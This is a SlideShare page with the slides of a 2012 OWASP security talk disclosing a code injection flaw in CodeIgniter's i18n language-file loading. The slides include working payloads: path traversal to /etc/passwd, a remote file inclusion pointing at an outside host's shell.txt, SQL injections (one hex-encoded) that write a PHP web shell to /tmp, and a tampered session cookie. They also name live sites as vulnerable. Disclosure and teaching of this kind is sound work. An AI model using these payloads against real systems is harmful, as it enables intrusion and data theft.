SlideShare a Scribd company logo

CodeIgniter i18n Security Flaw

Download as PPTX, PDF
Abbas Naderi
Abbas Naderi

This document discusses a code injection vulnerability in the internationalization (i18n) functionality of the CodeIgniter PHP web framework. Specifically, it shows how an attacker could exploit weaknesses in CodeIgniter's handling of localized language files to perform remote file inclusion (RFI) or local code inclusion attacks. The document provides examples of how an attacker could craft malicious input to include arbitrary files or code from remote or local systems. It also notes that over 240 existing CodeIgniter sites were found potentially vulnerable to this issue. In conclusion, the document invites questions and feedback on this CodeIgniter i18n code injection vulnerability.

Technology
1 of 25
20 May 2012 CodeIgniter i18n Code Injection Abbas Naderi (aka AbiusX) OWASP Chapter Leader of Iran ISSECO Member abbas.naderi@owasp.org / me@abiusx.com
Understand the Context
PHP • Mostly used SSI (75%) • 17 Years Maturity • Open Source Nature • Rapid Develop/Deploy • Secure Core • Insecure Libraries • Low Level Web Development *
PHP Frameworks • PHP low level web support • Incorporation of Frameworks • Much Used and Mature -> Secure • Huge Codebase -> Insecure • Developers, not Security guys • Security-Oriented Frameworks (OWASP ESAPI)
CodeIgniter • Most used Mid-level Framework
Internationalization • i18n importance today • Difficult implementation: – File-based (Wordpress, eFront, …) – Database (jFramework) – Code-based (CodeIgniter, …) • Obsolete consumers -> No testing
Remote File Inclusion
RFI at a glance • 3rd Most Common Vuln. in Top Ten 2007 : Malicious File Inclusion • Not in Top Ten 2010 : Mostly Understood and Fixed • Highest Impact (Run Arbitrary Code!) • Common on Interpreted Languages • Most Common in PHP (Why?)
RFI Example <?php $page = $_GET[„page‟]; include “./pages/{$page}.php”; Malicious Input: Mysite.com?page=../../../etc/passwd%00 Where current dir is /var/www include “/var/www/pages/../../../etc/passwd”; = include “/etc/passwd”; //show it on screen
RFI Cheatsheet Use null character on input to terminate string: include “./{$page}.you.cant.rfi.me.php”; Use absolute paths if input initiates include: include “{$_GET[‘page’]}”; page=http://abx.ir/shell.txt%00
allow_url_include
Filter Parameters • CodeIgniter has the least found exploits on all major PHP frameworks (Commercial Codebase) • CodeIgniter filters dangerous characters such as ‘ , “, /, ?, <, > on GET parameters, to prevent most XSS and Injection attacks. • CodeIgniter has central module loader, and MVC pattern, preventing most RFIs.
Internationalization
Internationalization (II)
Local File Inclusion • Useful to extract info. from target system – /etc/passwd – ./config/database.php • Easy to exploit
Local Code Inclusion • Requires a blind injection: – „” and 1=0 union select “<?php echo shell_exec($_REQUEST[q]); into outfile “/tmp/sales_lang.php” -- – CodeIgniter filters <? From input – „ and 1=0 union select unhex(“3c3f706870206563686f207368656c6c5f6578656328245f 524551554553545b715d29″) into outfile “/tmp/common_lang.php” -- – Caution: into outfile does not overwrite! – Where to find blind injection?
Local Code Inclusion (II) • Now change cookie from – a%3A8%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22aa55f87c8b18 afe75b3cd7baba330553%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A% 22178.162.154.251%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22M ozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10.7%3B+rv%3A12%22%3Bs%3 A13%3A%22last_activity%22%3Bs%3A10%3A%221337541932%22%3Bs%3A3%3A %22lan%22%3Bs%3A1%3A%221%22%3Bs%3A3%3A%22dir%22%3Bs%3A3%3A% 22rtl%22%3Bs%3A4%3A%22lang%22%3Bs%3A2%3A%22fa%22%3Bs%3A3%3A% 22alg%22%3Bs%3A5%3A%22right%22%3B%7Db3c9bed5e9656eca61938c9bc6965b ad – To lang%22%3Bs%3A2%3A%22../../../../../tmp
Remote Code Inclusion • Look at the code: include($package_path.'language/'.$idiom.'/'.$langfile); • You a hacker? tell me how!
Remote Code Inclusion (II) $this->load->add_package_path() Adding a package path instructs the Loader class to prepend a given path for subsequent requests for resources. As an example, the "Foo Bar" application package above has a library named Foo_bar.php. In our controller, we'd do the following: $this->load->add_package_path(APPPATH.'third_party/foo_bar/'); http://codeigniter.com/user_guide/libraries/loader.html
Demonstration
CodeIgniter + i18n • More than 240 sites discovered: – http://www.sedoparking.com – http://bambooinvoice.org/ – http://www.haughin.com/ – http://www.rapyd.com/ – http://code-igniter.ru/ • And tons more…
Questions? Feedback? Abbas Naderi (aka AbiusX) OWASP Chapter Leader of Iran ISSECO Member abiusx@acm.org / me@abiusx.com

Recommended

Everybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs tooEverybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs too
Nahidul Kibria
 
Http only cookie
Http only cookieHttp only cookie
Http only cookie
fool2fish
 
Security talk: Fortifying your Joomla! website
Security talk: Fortifying your Joomla! websiteSecurity talk: Fortifying your Joomla! website
Security talk: Fortifying your Joomla! websiteSigsiu.NET
 
XSS
XSSXSS
XSS
Hrishikesh Mishra
 
GUI Programming Concepts in Persian
GUI Programming Concepts in PersianGUI Programming Concepts in Persian
GUI Programming Concepts in Persian
Abbas Naderi
 
Secure Web Application Development Framework (Persian)
Secure Web Application Development Framework (Persian)Secure Web Application Development Framework (Persian)
Secure Web Application Development Framework (Persian)
Abbas Naderi
 
Vulnerable Active Record: A tale of SQL Injection in PHP Framework
Vulnerable Active Record: A tale of SQL Injection in PHP FrameworkVulnerable Active Record: A tale of SQL Injection in PHP Framework
Vulnerable Active Record: A tale of SQL Injection in PHP Framework
Pichaya Morimoto
 
Java Web Security Class
Java Web Security ClassJava Web Security Class
Java Web Security Class
Rich Helton
 

Recommended

Everybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs tooEverybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs too
Nahidul Kibria
 
Http only cookie
Http only cookieHttp only cookie
Http only cookie
fool2fish
 
Security talk: Fortifying your Joomla! website
Security talk: Fortifying your Joomla! websiteSecurity talk: Fortifying your Joomla! website
Security talk: Fortifying your Joomla! websiteSigsiu.NET
 
XSS
XSSXSS
XSS
Hrishikesh Mishra
 
GUI Programming Concepts in Persian
GUI Programming Concepts in PersianGUI Programming Concepts in Persian
GUI Programming Concepts in Persian
Abbas Naderi
 
Secure Web Application Development Framework (Persian)
Secure Web Application Development Framework (Persian)Secure Web Application Development Framework (Persian)
Secure Web Application Development Framework (Persian)
Abbas Naderi
 
Vulnerable Active Record: A tale of SQL Injection in PHP Framework
Vulnerable Active Record: A tale of SQL Injection in PHP FrameworkVulnerable Active Record: A tale of SQL Injection in PHP Framework
Vulnerable Active Record: A tale of SQL Injection in PHP Framework
Pichaya Morimoto
 
Java Web Security Class
Java Web Security ClassJava Web Security Class
Java Web Security Class
Rich Helton
 
Reliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan GandhiReliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan Gandhibhumika2108
 
Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧Orange Tsai
 
Orange@php conf
Orange@php confOrange@php conf
Orange@php confHash Lin
 
OWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript DevelopersOWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript Developers
Lewis Ardern
 
Anatomy of a Drupal Hack - TechKnowFile 2014
Anatomy of a Drupal Hack - TechKnowFile 2014Anatomy of a Drupal Hack - TechKnowFile 2014
Anatomy of a Drupal Hack - TechKnowFile 2014University of Toronto Libraries - Information Technology Services
 
Secure PHP Coding
Secure PHP CodingSecure PHP Coding
Secure PHP Coding
Narudom Roongsiriwong, CISSP
 
Malware Analysis For The Enterprise
Malware Analysis For The EnterpriseMalware Analysis For The Enterprise
Malware Analysis For The Enterprise
Jason Ross
 
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdfEN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
GiorgiRcheulishvili
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
guest3379bd
 
Flash it baby!
Flash it baby!Flash it baby!
Flash it baby!
Soroush Dalili
 
HTML5와 모바일
HTML5와 모바일HTML5와 모바일
HTML5와 모바일
ACCESS
 
Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoArt of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya Morimoto
Pichaya Morimoto
 
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
Ismail Tasdelen
 
OWASP SF - Reviewing Modern JavaScript Applications
OWASP SF - Reviewing Modern JavaScript ApplicationsOWASP SF - Reviewing Modern JavaScript Applications
OWASP SF - Reviewing Modern JavaScript Applications
Lewis Ardern
 
html5 & phonegap
html5 & phonegaphtml5 & phonegap
html5 & phonegap
Caesar Chi
 
Going on an HTTP Diet: Front-End Web Performance
Going on an HTTP Diet: Front-End Web PerformanceGoing on an HTTP Diet: Front-End Web Performance
Going on an HTTP Diet: Front-End Web Performance
Adam Norwood
 
Flashack
FlashackFlashack
Flashack
n|u - The Open Security Community
 
Google I/O 2012 - Protecting your user experience while integrating 3rd party...
Google I/O 2012 - Protecting your user experience while integrating 3rd party...Google I/O 2012 - Protecting your user experience while integrating 3rd party...
Google I/O 2012 - Protecting your user experience while integrating 3rd party...
Patrick Meenan
 
OSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainOSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ Infosectrain
InfosecTrain
 
What should a hacker know about WebDav?
What should a hacker know about WebDav?What should a hacker know about WebDav?
What should a hacker know about WebDav?
Mikhail Egorov
 
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
Neo4j
 
PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
ControlCase
 

More Related Content

Similar to CodeIgniter i18n Security Flaw

Reliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan GandhiReliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan Gandhibhumika2108
 
Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧Orange Tsai
 
Orange@php conf
Orange@php confOrange@php conf
Orange@php confHash Lin
 
OWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript DevelopersOWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript Developers
Lewis Ardern
 
Secure PHP Coding
Secure PHP CodingSecure PHP Coding
Secure PHP Coding
Narudom Roongsiriwong, CISSP
 
Malware Analysis For The Enterprise
Malware Analysis For The EnterpriseMalware Analysis For The Enterprise
Malware Analysis For The Enterprise
Jason Ross
 
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdfEN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
GiorgiRcheulishvili
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
guest3379bd
 
Flash it baby!
Flash it baby!Flash it baby!
Flash it baby!
Soroush Dalili
 
HTML5와 모바일
HTML5와 모바일HTML5와 모바일
HTML5와 모바일
ACCESS
 
Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoArt of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya Morimoto
Pichaya Morimoto
 
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
Ismail Tasdelen
 
OWASP SF - Reviewing Modern JavaScript Applications
OWASP SF - Reviewing Modern JavaScript ApplicationsOWASP SF - Reviewing Modern JavaScript Applications
OWASP SF - Reviewing Modern JavaScript Applications
Lewis Ardern
 
html5 & phonegap
html5 & phonegaphtml5 & phonegap
html5 & phonegap
Caesar Chi
 
Going on an HTTP Diet: Front-End Web Performance
Going on an HTTP Diet: Front-End Web PerformanceGoing on an HTTP Diet: Front-End Web Performance
Going on an HTTP Diet: Front-End Web Performance
Adam Norwood
 
Flashack
FlashackFlashack
Flashack
n|u - The Open Security Community
 
Google I/O 2012 - Protecting your user experience while integrating 3rd party...
Google I/O 2012 - Protecting your user experience while integrating 3rd party...Google I/O 2012 - Protecting your user experience while integrating 3rd party...
Google I/O 2012 - Protecting your user experience while integrating 3rd party...
Patrick Meenan
 
OSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainOSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ Infosectrain
InfosecTrain
 
What should a hacker know about WebDav?
What should a hacker know about WebDav?What should a hacker know about WebDav?
What should a hacker know about WebDav?
Mikhail Egorov
 

Similar to CodeIgniter i18n Security Flaw (20)

Reliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan GandhiReliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan Gandhi
 
Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧
 
Orange@php conf
Orange@php confOrange@php conf
Orange@php conf
 
OWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript DevelopersOWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript Developers
 
Anatomy of a Drupal Hack - TechKnowFile 2014
Anatomy of a Drupal Hack - TechKnowFile 2014Anatomy of a Drupal Hack - TechKnowFile 2014
Anatomy of a Drupal Hack - TechKnowFile 2014
 
Secure PHP Coding
Secure PHP CodingSecure PHP Coding
Secure PHP Coding
 
Malware Analysis For The Enterprise
Malware Analysis For The EnterpriseMalware Analysis For The Enterprise
Malware Analysis For The Enterprise
 
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdfEN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
 
Flash it baby!
Flash it baby!Flash it baby!
Flash it baby!
 
HTML5와 모바일
HTML5와 모바일HTML5와 모바일
HTML5와 모바일
 
Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoArt of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya Morimoto
 
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
 
OWASP SF - Reviewing Modern JavaScript Applications
OWASP SF - Reviewing Modern JavaScript ApplicationsOWASP SF - Reviewing Modern JavaScript Applications
OWASP SF - Reviewing Modern JavaScript Applications
 
html5 & phonegap
html5 & phonegaphtml5 & phonegap
html5 & phonegap
 
Going on an HTTP Diet: Front-End Web Performance
Going on an HTTP Diet: Front-End Web PerformanceGoing on an HTTP Diet: Front-End Web Performance
Going on an HTTP Diet: Front-End Web Performance
 
Flashack
FlashackFlashack
Flashack
 
Google I/O 2012 - Protecting your user experience while integrating 3rd party...
Google I/O 2012 - Protecting your user experience while integrating 3rd party...Google I/O 2012 - Protecting your user experience while integrating 3rd party...
Google I/O 2012 - Protecting your user experience while integrating 3rd party...
 
OSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainOSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ Infosectrain
 
What should a hacker know about WebDav?
What should a hacker know about WebDav?What should a hacker know about WebDav?
What should a hacker know about WebDav?
 

Recently uploaded

GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
Neo4j
 
PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
ControlCase
 
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
Neo4j
 
Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
Kari Kakkonen
 
The Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and SalesThe Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and Sales
Laura Byrne
 
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Albert Hoitingh
 
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
SOFTTECHHUB
 
Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?
Nexer Digital
 
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
SOFTTECHHUB
 
Artificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopmentArtificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopment
Octavian Nadolu
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
Guy Korland
 
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
Neo4j
 
Uni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdfUni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems S.M.S.A.
 
Large Language Model (LLM) and it’s Geospatial Applications
Large Language Model (LLM) and it’s Geospatial ApplicationsLarge Language Model (LLM) and it’s Geospatial Applications
Large Language Model (LLM) and it’s Geospatial Applications
Rohit Gautam
 
zkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex Proofs
zkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex ProofszkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex Proofs
zkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex Proofs
Alex Pruden
 
Generative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to ProductionGenerative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to Production
Aggregage
 
Video Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the FutureVideo Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the Future
Alpen-Adria-Universität
 
Monitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR EventsMonitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR Events
Ana-Maria Mihalceanu
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
Kari Kakkonen
 
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptx
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptxSecstrike : Reverse Engineering & Pwnable tools for CTF.pptx
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptx
nkrafacyberclub
 

Recently uploaded (20)

GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
 
PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
 
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
 
Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
 
The Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and SalesThe Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and Sales
 
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
 
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
 
Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?
 
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
 
Artificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopmentArtificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopment
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
 
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
 
Uni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdfUni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdf
 
Large Language Model (LLM) and it’s Geospatial Applications
Large Language Model (LLM) and it’s Geospatial ApplicationsLarge Language Model (LLM) and it’s Geospatial Applications
Large Language Model (LLM) and it’s Geospatial Applications
 
zkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex Proofs
zkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex ProofszkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex Proofs
zkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex Proofs
 
Generative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to ProductionGenerative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to Production
 
Video Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the FutureVideo Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the Future
 
Monitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR EventsMonitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR Events
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
 
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptx
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptxSecstrike : Reverse Engineering & Pwnable tools for CTF.pptx
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptx
 

CodeIgniter i18n Security Flaw

  • 1. 20 May 2012 CodeIgniter i18n Code Injection Abbas Naderi (aka AbiusX) OWASP Chapter Leader of Iran ISSECO Member abbas.naderi@owasp.org / me@abiusx.com
  • 3. PHP • Mostly used SSI (75%) • 17 Years Maturity • Open Source Nature • Rapid Develop/Deploy • Secure Core • Insecure Libraries • Low Level Web Development *
  • 4. PHP Frameworks • PHP low level web support • Incorporation of Frameworks • Much Used and Mature -> Secure • Huge Codebase -> Insecure • Developers, not Security guys • Security-Oriented Frameworks (OWASP ESAPI)
  • 5. CodeIgniter • Most used Mid-level Framework
  • 6. Internationalization • i18n importance today • Difficult implementation: – File-based (Wordpress, eFront, …) – Database (jFramework) – Code-based (CodeIgniter, …) • Obsolete consumers -> No testing
  • 8. RFI at a glance • 3rd Most Common Vuln. in Top Ten 2007 : Malicious File Inclusion • Not in Top Ten 2010 : Mostly Understood and Fixed • Highest Impact (Run Arbitrary Code!) • Common on Interpreted Languages • Most Common in PHP (Why?)
  • 9. RFI Example <?php $page = $_GET[„page‟]; include “./pages/{$page}.php”; Malicious Input: Mysite.com?page=../../../etc/passwd%00 Where current dir is /var/www include “/var/www/pages/../../../etc/passwd”; = include “/etc/passwd”; //show it on screen
  • 10. RFI Cheatsheet Use null character on input to terminate string: include “./{$page}.you.cant.rfi.me.php”; Use absolute paths if input initiates include: include “{$_GET[‘page’]}”; page=http://abx.ir/shell.txt%00
  • 12.
  • 13. Filter Parameters • CodeIgniter has the least found exploits on all major PHP frameworks (Commercial Codebase) • CodeIgniter filters dangerous characters such as ‘ , “, /, ?, <, > on GET parameters, to prevent most XSS and Injection attacks. • CodeIgniter has central module loader, and MVC pattern, preventing most RFIs.
  • 16.
  • 17. Local File Inclusion • Useful to extract info. from target system – /etc/passwd – ./config/database.php • Easy to exploit
  • 18. Local Code Inclusion • Requires a blind injection: – „” and 1=0 union select “<?php echo shell_exec($_REQUEST[q]); into outfile “/tmp/sales_lang.php” -- – CodeIgniter filters <? From input – „ and 1=0 union select unhex(“3c3f706870206563686f207368656c6c5f6578656328245f 524551554553545b715d29″) into outfile “/tmp/common_lang.php” -- – Caution: into outfile does not overwrite! – Where to find blind injection?
